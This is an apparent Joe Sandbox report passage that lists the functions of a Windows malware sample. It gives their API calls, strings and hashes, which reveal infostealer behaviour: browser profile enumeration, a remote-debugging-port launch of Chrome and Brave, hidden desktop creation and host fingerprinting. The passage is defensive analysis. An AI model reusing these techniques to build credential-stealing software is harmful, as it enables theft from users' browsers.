                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                            • String ID: ERROR$ERROR
                                            • API String ID: 3287882509-2579291623
                                            • Opcode ID: 243c3ba6e4d083e298a404233cb39cc9641087610bb8f65c24bf72cb52f6143f
                                            • Instruction ID: 220a7b172e2a8d17d187597bbcd3bb12c7c2fc56be07e285a6b23909b802432f
                                            • Opcode Fuzzy Hash: 243c3ba6e4d083e298a404233cb39cc9641087610bb8f65c24bf72cb52f6143f
                                            • Instruction Fuzzy Hash: 6E118630A01048ABCB14FF65EC52EED33399F50354F40456EF90A5B4A2EF38AB95C65E
                                            Function 00417A70 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416CCB), ref: 00417AA0
                                            • HeapAlloc.KERNEL32(00000000,?,?,?,00416CCB), ref: 00417AA7
                                            • GetComputerNameA.KERNEL32(?,00000104), ref: 00417ABF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocComputerNameProcess
                                            • String ID:
                                            • API String ID: 4203777966-0
                                            • Opcode ID: bd395e3c10b2e9752f846d4f55ec5ddb2c88ed80ced139acaed9e3128f7bbde2
                                            • Instruction ID: 80df14e24d55d9e77394b8c0389cbc6422d62e125eda11eaf6ba37d1415b345b
                                            • Opcode Fuzzy Hash: bd395e3c10b2e9752f846d4f55ec5ddb2c88ed80ced139acaed9e3128f7bbde2
                                            • Instruction Fuzzy Hash: D60181B1E08359ABC700CF98DD45BAFBBB8FB04751F10021BF505E2280E7B85A408BA2
                                            Function 00401110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416CBC), ref: 0040112B
                                            • VirtualAllocExNuma.KERNEL32(00000000,?,?,00416CBC), ref: 00401132
                                            • ExitProcess.KERNEL32 ref: 00401143
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Process$AllocCurrentExitNumaVirtual
                                            • String ID:
                                            • API String ID: 1103761159-0
                                            • Opcode ID: 11ea4e03c837496306c88658afd9ed440fb44e3d5b70bdcdd02673fa8ef340ef
                                            • Instruction ID: f86d798d442288df0e099431c712f1cdbed5da6d4770a056b1c254158006f616
                                            • Opcode Fuzzy Hash: 11ea4e03c837496306c88658afd9ed440fb44e3d5b70bdcdd02673fa8ef340ef
                                            • Instruction Fuzzy Hash: DCE0E670D8A30CFBE7105BA19D0AB4D77689B04B15F101156F709BA5D0D6B92640565D
                                            Function 008407A6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 008407CE
                                            • Module32First.KERNEL32(00000000,00000224), ref: 008407EE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929328076.0000000000840000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_840000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                            • String ID:
                                            • API String ID: 3833638111-0
                                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                            • Instruction ID: 31dd417f0b46843a24ac24f44a75c6a7240eb4ebe4faebe9566caac4c9cb6200
                                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                            • Instruction Fuzzy Hash: 2CF06D326017196BE7203AB9A88DA6F76E8FF89765F100528E742D10C0DAB5F8458E62
                                            Function 02450E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetErrorMode.KERNEL32(00000400,?,?,02450223,?,?), ref: 02450E19
                                            • SetErrorMode.KERNEL32(00000000,?,?,02450223,?,?), ref: 02450E1E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorMode
                                            • String ID:
                                            • API String ID: 2340568224-0
                                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                            • Instruction ID: e1b12fe88f2fad782c68d0e31ab567b73fc92b09f825ff25b4754dc4cb9b2f3f
                                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                            • Instruction Fuzzy Hash: 0CD0123514512877D7002A94DC09BCE7B1CDF09B66F108011FB0DD9181C770954046E5
                                            Function 004010A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416CBC), ref: 004010B3
                                            • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,00416CBC), ref: 004010F7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Virtual$AllocFree
                                            • String ID:
                                            • API String ID: 2087232378-0
                                            • Opcode ID: 4ccb3339a7f6084aabfd7cf6baf65b53e8baa26228d10618978cb16090ab9117
                                            • Instruction ID: a2dd58c0224e163af538114889642f36ecbeef109afe3d50a53e5cb7169f74e2
                                            • Opcode Fuzzy Hash: 4ccb3339a7f6084aabfd7cf6baf65b53e8baa26228d10618978cb16090ab9117
                                            • Instruction Fuzzy Hash: 74F0E2B1A42208BBE7149AA4AC59FAFB799E705B04F300459F540E3290D571AF00DAA4
                                            Function 00401190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00417A70: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416CCB), ref: 00417AA0
                                              • Part of subcall function 00417A70: HeapAlloc.KERNEL32(00000000,?,?,?,00416CCB), ref: 00417AA7
                                              • Part of subcall function 00417A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00417ABF
                                              • Part of subcall function 004179E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417A10
                                              • Part of subcall function 004179E0: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417A17
                                              • Part of subcall function 004179E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00417A2F
                                            • ExitProcess.KERNEL32 ref: 004011C6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$Process$AllocName$ComputerExitUser
                                            • String ID:
                                            • API String ID: 1004333139-0
                                            • Opcode ID: dcd40bd9b7440eb8545f2694ec48fb4b44b4fea9788a6d776e7c72e508f0613a
                                            • Instruction ID: bcf4cddec8ba3652d3daa4bfa83a7295d39fc22ea0064294e7a9f420d8d9705c
                                            • Opcode Fuzzy Hash: dcd40bd9b7440eb8545f2694ec48fb4b44b4fea9788a6d776e7c72e508f0613a
                                            • Instruction Fuzzy Hash: E1E0ECB5D5820152DB1473B6AC06B5B339D5B1934EF04142FF90896252FE29F8404169
                                            Function 00840465 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 008404B6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929328076.0000000000840000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_840000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                            • Instruction ID: 89afeacf3f88c61f0aa4669cd2c0956d04deb6d01c2eec4ac8043f773b7f33c1
                                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                            • Instruction Fuzzy Hash: 64113C79A40208EFDB01DF98C985E99BBF5EF08350F058094FA489B362D375EA90DF81

                                            Non-executed Functions

                                            Function 0040BE40 Relevance: 63.7, APIs: 29, Strings: 7, Instructions: 727fileCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                            • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2F,00000000,?,?,?,00421450,00420B2E), ref: 0040BEC5
                                            • StrCmpCA.SHLWAPI(?,00421454), ref: 0040BF33
                                            • StrCmpCA.SHLWAPI(?,00421458), ref: 0040BF49
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0040C8A9
                                            • FindClose.KERNEL32(000000FF), ref: 0040C8BB
                                            Strings
                                            • --remote-debugging-port=9229 --profile-directory=", xrefs: 0040C495
                                            • Preferences, xrefs: 0040C104
                                            • --remote-debugging-port=9229 --profile-directory=", xrefs: 0040C3B2
                                            • --remote-debugging-port=9229 --profile-directory=", xrefs: 0040C534
                                            • \Brave\Preferences, xrefs: 0040C1C1
                                            • Brave, xrefs: 0040C0E8
                                            • Google Chrome, xrefs: 0040C6F8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                            • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                            • API String ID: 3334442632-1869280968
                                            • Opcode ID: 7f2c12acea1fb690b98b804b029ed6a0b383e69760eb48825d33dc6626a9561a
                                            • Instruction ID: 94c18d54b217f3a33de79012ae3cbc39d408ee074d55138b38aa149d1ce8c153
                                            • Opcode Fuzzy Hash: 7f2c12acea1fb690b98b804b029ed6a0b383e69760eb48825d33dc6626a9561a
                                            • Instruction Fuzzy Hash: 5C52A871A011049BCB14FB61DC96EEE733DAF54304F4045AEF50A66091EF386B98CFAA
                                            Function 00413B00 Relevance: 47.5, APIs: 21, Strings: 6, Instructions: 250filestringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • wsprintfA.USER32 ref: 00413B1C
                                            • FindFirstFileA.KERNEL32(?,?), ref: 00413B33
                                            • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413B85
                                            • StrCmpCA.SHLWAPI(?,00420F58), ref: 00413B97
                                            • StrCmpCA.SHLWAPI(?,00420F5C), ref: 00413BAD
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00413EB7
                                            • FindClose.KERNEL32(000000FF), ref: 00413ECC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                            • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*$q?A
                                            • API String ID: 1125553467-4052298153
                                            • Opcode ID: 5188e768485120e5afde4a9c889630e7fccae7ad22d18829d963d7ba80f2afd1
                                            • Instruction ID: 118bc6de907018410b19fab89ebe74f6f374c1ff32bc5bb8bfd4c4c53b142975
                                            • Opcode Fuzzy Hash: 5188e768485120e5afde4a9c889630e7fccae7ad22d18829d963d7ba80f2afd1
                                            • Instruction Fuzzy Hash: E9A141B1A042189BDB24DF64DC85FEA7379BB48301F44458EF60D96181EB74AB88CF66
                                            Function 0245C0A7 Relevance: 44.2, APIs: 29, Instructions: 727fileCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                              • Part of subcall function 0246AE97: lstrcpy.KERNEL32(00000000,?), ref: 0246AEE9
                                              • Part of subcall function 0246AE97: lstrcat.KERNEL32(00000000), ref: 0246AEF9
                                              • Part of subcall function 0246AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0246AF3C
                                              • Part of subcall function 0246AF27: lstrcpy.KERNEL32(00000000), ref: 0246AF7B
                                              • Part of subcall function 0246AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0246AF89
                                              • Part of subcall function 0246AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0246AE7C
                                            • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2F,00000000,?,?,?,00421450,00420B2E), ref: 0245C12C
                                            • StrCmpCA.SHLWAPI(?,00421454), ref: 0245C19A
                                            • StrCmpCA.SHLWAPI(?,00421458), ref: 0245C1B0
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0245CB10
                                            • FindClose.KERNEL32(000000FF), ref: 0245CB22
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                            • String ID:
                                            • API String ID: 3334442632-0
                                            • Opcode ID: 7b98e80a942e0a63a7546d3dbe04fcd52efaade0bac1e590d268923d2021d0db
                                            • Instruction ID: d47526ed6a10129815c062a2c0219f9555e38e12d9ff692fe71c4cfb60d38214
                                            • Opcode Fuzzy Hash: 7b98e80a942e0a63a7546d3dbe04fcd52efaade0bac1e590d268923d2021d0db
                                            • Instruction Fuzzy Hash: B8520672900624ABCB14FB61DC99EFE773AAF54305F40459EE54AB6090EF349B48CF52
                                            Function 00414B60 Relevance: 38.7, APIs: 18, Strings: 4, Instructions: 172fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • wsprintfA.USER32 ref: 00414B7C
                                            • FindFirstFileA.KERNEL32(?,?), ref: 00414B93
                                            • StrCmpCA.SHLWAPI(?,00420FC4), ref: 00414BC1
                                            • StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414BD7
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00414DCD
                                            • FindClose.KERNEL32(000000FF), ref: 00414DE2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$File$CloseFirstNextwsprintf
                                            • String ID: %s\%s$%s\%s$%s\*$-SA
                                            • API String ID: 180737720-309722913
                                            • Opcode ID: 10fc233258d7d774f39183cfdf7fbc98fbe50a34da23b857008ae2781d984a66
                                            • Instruction ID: 6eceda3e2f2aeeb228f448c6629b31eb3c314648a2220d8d34325ba683034fba
                                            • Opcode Fuzzy Hash: 10fc233258d7d774f39183cfdf7fbc98fbe50a34da23b857008ae2781d984a66
                                            • Instruction Fuzzy Hash: F2617771904218ABCB20EBA0ED45FEA737DBF48701F40458EF60996191FB74AB84CF95
                                            Function 02463D67 Relevance: 31.8, APIs: 21, Instructions: 250filestringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • wsprintfA.USER32 ref: 02463D83
                                            • FindFirstFileA.KERNEL32(?,?), ref: 02463D9A
                                            • lstrcat.KERNEL32(?,?), ref: 02463DEC
                                            • StrCmpCA.SHLWAPI(?,00420F58), ref: 02463DFE
                                            • StrCmpCA.SHLWAPI(?,00420F5C), ref: 02463E14
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0246411E
                                            • FindClose.KERNEL32(000000FF), ref: 02464133
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                            • String ID:
                                            • API String ID: 1125553467-0
                                            • Opcode ID: 3ab95b3bf23d215e0781e232aecc607664a3e5c33156cac28c621625d69ea7f5
                                            • Instruction ID: e6359be6b2c03e71b3979fcca3f21b4b3761a9fd5c728a97feaad8b07995aefb
                                            • Opcode Fuzzy Hash: 3ab95b3bf23d215e0781e232aecc607664a3e5c33156cac28c621625d69ea7f5
                                            • Instruction Fuzzy Hash: 46A16271A00218ABDB34DFA4DC88FFA7379AF58700F44458EE60D96180EB759B84CF62
                                            Function 004147C0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 004147D0
                                            • HeapAlloc.KERNEL32(00000000), ref: 004147D7
                                            • wsprintfA.USER32 ref: 004147F6
                                            • FindFirstFileA.KERNEL32(?,?), ref: 0041480D
                                            • StrCmpCA.SHLWAPI(?,00420FAC), ref: 0041483B
                                            • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00414851
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 004148DB
                                            • FindClose.KERNEL32(000000FF), ref: 004148F0
                                            • lstrcatA.KERNEL32(?,009D1EC0,?,00000104), ref: 00414915
                                            • lstrcatA.KERNEL32(?,009D0F88), ref: 00414928
                                            • lstrlenA.KERNEL32(?), ref: 00414935
                                            • lstrlenA.KERNEL32(?), ref: 00414946
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
                                            • String ID: %s\%s$%s\*
                                            • API String ID: 13328894-2848263008
                                            • Opcode ID: 69dcb7b57205299e4e353f4ff5e3bd6fee26fba3a9fd294cee8ca8b6e7cecfcb
                                            • Instruction ID: 4add3c5e25650dce6a2d7e09fe25a02d5f48076a238705849ce39c3d90be09a7
                                            • Opcode Fuzzy Hash: 69dcb7b57205299e4e353f4ff5e3bd6fee26fba3a9fd294cee8ca8b6e7cecfcb
                                            • Instruction Fuzzy Hash: 145187B1944218ABCB20EB70DC89FEE737DAB58300F40459EB64996190EB74EBC4CF95
                                            Function 02464DC7 Relevance: 27.2, APIs: 18, Instructions: 172fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • wsprintfA.USER32 ref: 02464DE3
                                            • FindFirstFileA.KERNEL32(?,?), ref: 02464DFA
                                            • StrCmpCA.SHLWAPI(?,00420FC4), ref: 02464E28
                                            • StrCmpCA.SHLWAPI(?,00420FC8), ref: 02464E3E
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 02465034
                                            • FindClose.KERNEL32(000000FF), ref: 02465049
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$File$CloseFirstNextwsprintf
                                            • String ID:
                                            • API String ID: 180737720-0
                                            • Opcode ID: fcb2fc1512f1b2bfff4d459872b36b8889449b0cd5417e01b30465ecde3626f1
                                            • Instruction ID: 1f884cfae3eddee3d28d981b3bc4e58ce56ffb96e297e93c37078dd8df76bd4e
                                            • Opcode Fuzzy Hash: fcb2fc1512f1b2bfff4d459872b36b8889449b0cd5417e01b30465ecde3626f1
                                            • Instruction Fuzzy Hash: C3615771900228ABCB24EBA4DD48FEA737DAF48701F44468EF64D96180EB759784CF91
                                            Function 00409E30 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 157stringsleepprocessCOMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 00409E47
                                              • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,009CBD38,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                            • wsprintfA.USER32 ref: 00409E7F
                                            • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00409EA3
                                            • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00409ECC
                                            • memset.MSVCRT ref: 00409EED
                                            • lstrcatA.KERNEL32(00000000,?), ref: 00409F03
                                            • lstrcatA.KERNEL32(00000000,?), ref: 00409F17
                                            • lstrcatA.KERNEL32(00000000,004212D8), ref: 00409F29
                                            • memset.MSVCRT ref: 00409F3D
                                            • lstrcpy.KERNEL32(?,00000000), ref: 00409F7C
                                            • memset.MSVCRT ref: 00409F9C
                                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,00000000), ref: 0040A004
                                            • Sleep.KERNEL32(00001388), ref: 0040A013
                                            • CloseDesktop.USER32(00000000), ref: 0040A060
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: memset$Desktoplstrcat$Create$CloseOpenProcessSleepSystemTimelstrcpywsprintf
                                            • String ID: D
                                            • API String ID: 1347862506-2746444292
                                            • Opcode ID: a10202c694136cf4b08f8315fe38596f638a8bb39b3ba1580b4dfb3a89c0cba5
                                            • Instruction ID: 9351db1e319cd03a78e50f41365f33c4a7b54471eb3ec1f6bde0cae738676000
                                            • Opcode Fuzzy Hash: a10202c694136cf4b08f8315fe38596f638a8bb39b3ba1580b4dfb3a89c0cba5
                                            • Instruction Fuzzy Hash: B551B3B1D04318ABDB20DF60DC4AFDA7778AB48704F004599F60DAA2D1EB75AB84CF55
